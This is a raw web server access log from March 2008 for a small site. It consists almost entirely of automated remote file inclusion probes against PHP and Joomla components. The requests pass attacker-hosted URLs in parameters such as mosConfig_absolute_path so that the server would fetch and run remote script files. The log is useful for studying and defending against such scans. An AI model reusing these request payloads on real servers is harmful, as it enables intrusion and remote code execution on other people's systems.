206.221.184.180 - - [09/Mar/2008:19:22:37 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:22:37 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:22:37 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:22:37 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:23:24 -0700] "GET /logs/%3Cwbr%20/%3Eaccess_080128.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:23:24 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:23:24 -0700] "GET /logs/%3Cwbr%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
87.106.71.89 - - [09/Mar/2008:19:24:55 -0700] "GET /principal.php?conteudo=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
196.35.158.181 - - [09/Mar/2008:19:26:39 -0700] "GET /logs/access_080204.log/modules/My_eGallery/index.php?basepath=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.106.71.89 - - [09/Mar/2008:19:26:40 -0700] "GET /logs/access_080211.log/principal.php?conteudo=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.106.71.89 - - [09/Mar/2008:19:26:40 -0700] "GET /logs/principal.php?conteudo=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
196.35.158.180 - - [09/Mar/2008:19:26:42 -0700] "GET /logs/access_080204.log/modules/My_eGallery/index.php?basepath=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
64.38.24.138 - - [09/Mar/2008:19:26:54 -0700] "GET /logs/access_080114.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.38.24.138 - - [09/Mar/2008:19:26:55 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.38.24.138 - - [09/Mar/2008:19:26:55 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
212.17.26.135 - - [09/Mar/2008:19:28:05 -0700] "GET /logs/access_071231.log/include/statistic.inc.php?tm_includepath=http://it.geocities.com/biglionpowa/bsid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
212.17.26.135 - - [09/Mar/2008:19:28:05 -0700] "GET /logs/include/statistic.inc.php?tm_includepath=http://it.geocities.com/biglionpowa/bsid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:28:21 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:28:21 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:28:22 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:28:22 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.38.24.138 - - [09/Mar/2008:19:28:26 -0700] "GET /logs/access_071126.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
212.17.26.135 - - [09/Mar/2008:19:29:42 -0700] "GET /logs/access_080114.log/include/statistic.inc.php?tm_includepath=http://it.geocities.com/biglionpowa/bsid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
196.35.158.181 - - [09/Mar/2008:19:30:03 -0700] "GET /logs/access_080121.log/modules/My_eGallery/index.php?basepath=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
196.35.158.180 - - [09/Mar/2008:19:30:06 -0700] "GET /logs/access_080121.log/modules/My_eGallery/index.php?basepath=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
74.86.153.130 - - [09/Mar/2008:19:30:31 -0700] "GET /logs/access_080211.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.86.153.130 - - [09/Mar/2008:19:30:31 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.86.153.130 - - [09/Mar/2008:19:30:32 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
205.234.222.30 - - [09/Mar/2008:19:30:42 -0700] "GET /logs/aedating4CMS.php?dir[inc]=http://www.gomaka.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.toulouseangloexchange.com"
205.234.222.30 - - [09/Mar/2008:19:30:44 -0700] "GET /aedating4CMS.php?dir[inc]=http://www.gomaka.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.toulouseangloexchange.com"
62.152.127.174 - - [09/Mar/2008:19:31:27 -0700] "GET /aedating4CMS.php?dir[inc]=http://www.gomaka.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.toulouseangloexchange.com"
62.152.127.174 - - [09/Mar/2008:19:31:27 -0700] "GET /logs/aedating4CMS.php?dir[inc]=http://www.gomaka.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:31:31 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:31:31 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:31:34 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [09/Mar/2008:19:31:34 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.13.229.88 - - [09/Mar/2008:19:32:09 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_remository&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.costatropicalinternet.com/images/listing_button.png? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.toulouseangloexchange.com"
64.13.229.88 - - [09/Mar/2008:19:32:09 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_remository&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.costatropicalinternet.com/images/listing_button.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.toulouseangloexchange.com"
64.13.229.88 - - [09/Mar/2008:19:34:23 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_webring&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.costatropicalinternet.com/images/listing_button.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.toulouseangloexchange.com"
64.13.229.88 - - [09/Mar/2008:19:34:23 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_webring&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.costatropicalinternet.com/images/listing_button.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.toulouseangloexchange.com"
72.15.196.106 - - [09/Mar/2008:19:35:02 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.toulouseangloexchange.com"
72.15.196.106 - - [09/Mar/2008:19:35:02 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.toulouseangloexchange.com"
89.218.85.18 - - [09/Mar/2008:19:36:05 -0700] "GET /logs/access_071112.log//skin/zero_vote/ask_password.php?dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.218.85.18 - - [09/Mar/2008:19:36:06 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.218.85.18 - - [09/Mar/2008:19:36:06 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
74.86.153.130 - - [09/Mar/2008:19:37:15 -0700] "GET /logs/access_080121.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
89.218.85.18 - - [09/Mar/2008:19:38:58 -0700] "GET /logs/access_071203.log//skin/zero_vote/ask_password.php?dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
64.13.229.88 - - [09/Mar/2008:19:40:02 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.costatropicalinternet.com/images/listing_button.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.toulouseangloexchange.com"
64.13.229.88 - - [09/Mar/2008:19:40:02 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.costatropicalinternet.com/images/listing_button.png? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.toulouseangloexchange.com"
211.174.60.66 - - [09/Mar/2008:19:41:46 -0700] "GET /logs/access_080211.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.174.60.66 - - [09/Mar/2008:19:41:46 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
211.174.60.66 - - [09/Mar/2008:19:41:47 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
82.197.162.221 - - [09/Mar/2008:19:42:29 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://angel.yum.pl/joomla/images/borda10.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
67.195.44.108 - - [09/Mar/2008:19:43:37 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
67.195.44.92 - - [09/Mar/2008:19:43:41 -0700] "GET /logs/access_080114.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
128.121.21.39 - - [09/Mar/2008:19:45:34 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://psycho1.psychologie.uni-bremen.de/tikiwiki-1.9.0/styles/vidiki/cm.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.toulouseangloexchange.com"
128.121.21.39 - - [09/Mar/2008:19:45:34 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://psycho1.psychologie.uni-bremen.de/tikiwiki-1.9.0/styles/vidiki/cm.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
205.234.201.179 - - [09/Mar/2008:19:45:57 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://papparatzi.net/joomla?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.208.65.241 - - [09/Mar/2008:19:47:48 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.19.135.21 - - [09/Mar/2008:19:48:07 -0700] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.19.135.21 - - [09/Mar/2008:19:48:07 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.19.135.21 - - [09/Mar/2008:19:48:07 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
200.170.201.136 - - [09/Mar/2008:19:48:24 -0700] "GET /logs/scripts.log/index.php3?lang=http://www.fuckerboy.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
200.170.201.136 - - [09/Mar/2008:19:48:24 -0700] "GET /index.php3?lang=http://www.fuckerboy.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
200.170.201.136 - - [09/Mar/2008:19:48:25 -0700] "GET /logs/index.php3?lang=http://www.fuckerboy.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.92.147.31 - - [09/Mar/2008:19:49:48 -0700] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.92.147.31 - - [09/Mar/2008:19:49:48 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.92.147.31 - - [09/Mar/2008:19:49:49 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.92.147.31 - - [09/Mar/2008:19:50:16 -0700] "GET /logs/access_080204.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
217.144.195.123 - - [09/Mar/2008:19:50:24 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.19.135.21 - - [09/Mar/2008:19:51:13 -0700] "GET /logs/access_080204.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.92.147.31 - - [09/Mar/2008:19:52:01 -0700] "GET /logs/access_080211.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.92.147.31 - - [09/Mar/2008:19:52:01 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.92.147.31 - - [09/Mar/2008:19:52:02 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.214.60.110 - - [09/Mar/2008:19:52:22 -0700] "GET /?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 200 919 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
78.108.81.71 - - [09/Mar/2008:19:52:53 -0700] "GET /?mosConfig_absolute_path=http://www.eq2arena.com/content/data1/alba.txt?? HTTP/1.1" 200 919 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.19.135.21 - - [09/Mar/2008:19:52:59 -0700] "GET /logs/access_080127.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.19.135.21 - - [09/Mar/2008:19:52:59 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.19.135.21 - - [09/Mar/2008:19:52:59 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.19.135.21 - - [09/Mar/2008:19:54:19 -0700] "GET /logs/access_080211.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
67.195.44.102 - - [09/Mar/2008:19:55:22 -0700] "GET /logs/access_080211.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:55:38 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.46.22.212 - - [09/Mar/2008:19:55:38 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.freewebtown.com/laznet/v.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
211.174.60.66 - - [09/Mar/2008:19:56:16 -0700] "GET /logs/access_080204.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.geocities.com/rha.mutzz/file/cdm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
87.106.71.89 - - [09/Mar/2008:19:56:26 -0700] "GET /logs/access_080211.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.106.71.89 - - [09/Mar/2008:19:56:26 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.106.71.89 - - [09/Mar/2008:19:56:27 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
69.64.58.141 - - [09/Mar/2008:19:58:02 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://flycarmodel.com/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
193.218.153.78 - - [09/Mar/2008:19:59:10 -0700] "GET /logs/access_071126.log//admin.php?include_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.218.153.78 - - [09/Mar/2008:19:59:10 -0700] "GET //admin.php?include_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.218.153.78 - - [09/Mar/2008:19:59:10 -0700] "GET /logs//admin.php?include_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.218.153.78 - - [09/Mar/2008:19:59:14 -0700] "GET /logs/access_071126.log//admin.php?include_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.218.153.78 - - [09/Mar/2008:19:59:14 -0700] "GET /logs/access_071126.log//admin.php?include_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.218.153.78 - - [09/Mar/2008:19:59:14 -0700] "GET //admin.php?include_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.218.153.78 - - [09/Mar/2008:19:59:14 -0700] "GET //admin.php?include_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.218.153.78 - - [09/Mar/2008:19:59:14 -0700] "GET /logs//admin.php?include_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.218.153.78 - - [09/Mar/2008:19:59:14 -0700] "GET /logs//admin.php?include_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.218.153.78 - - [09/Mar/2008:19:59:21 -0700] "GET /logs/access_071112.log//admin.php?include_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.218.153.78 - - [09/Mar/2008:19:59:26 -0700] "GET /logs/access_071112.log//admin.php?include_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.218.153.78 - - [09/Mar/2008:19:59:27 -0700] "GET /logs/access_071112.log//admin.php?include_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
63.195.191.15 - - [09/Mar/2008:19:59:49 -0700] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.fansvictorvaldes.es//images/data/bmx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
85.214.60.110 - - [09/Mar/2008:20:00:03 -0700] "GET /logs/access_080127.log/?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.214.60.110 - - [09/Mar/2008:20:00:03 -0700] "GET /logs/?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 200 4227 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.214.60.110 - - [09/Mar/2008:20:00:34 -0700] "GET /logs/access_071119.log/?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
200.170.201.136 - - [09/Mar/2008:20:01:24 -0700] "GET /logs/access_080204.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.fuckerboy.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
200.170.201.136 - - [09/Mar/2008:20:01:24 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.fuckerboy.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
200.170.201.136 - - [09/Mar/2008:20:01:25 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.fuckerboy.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
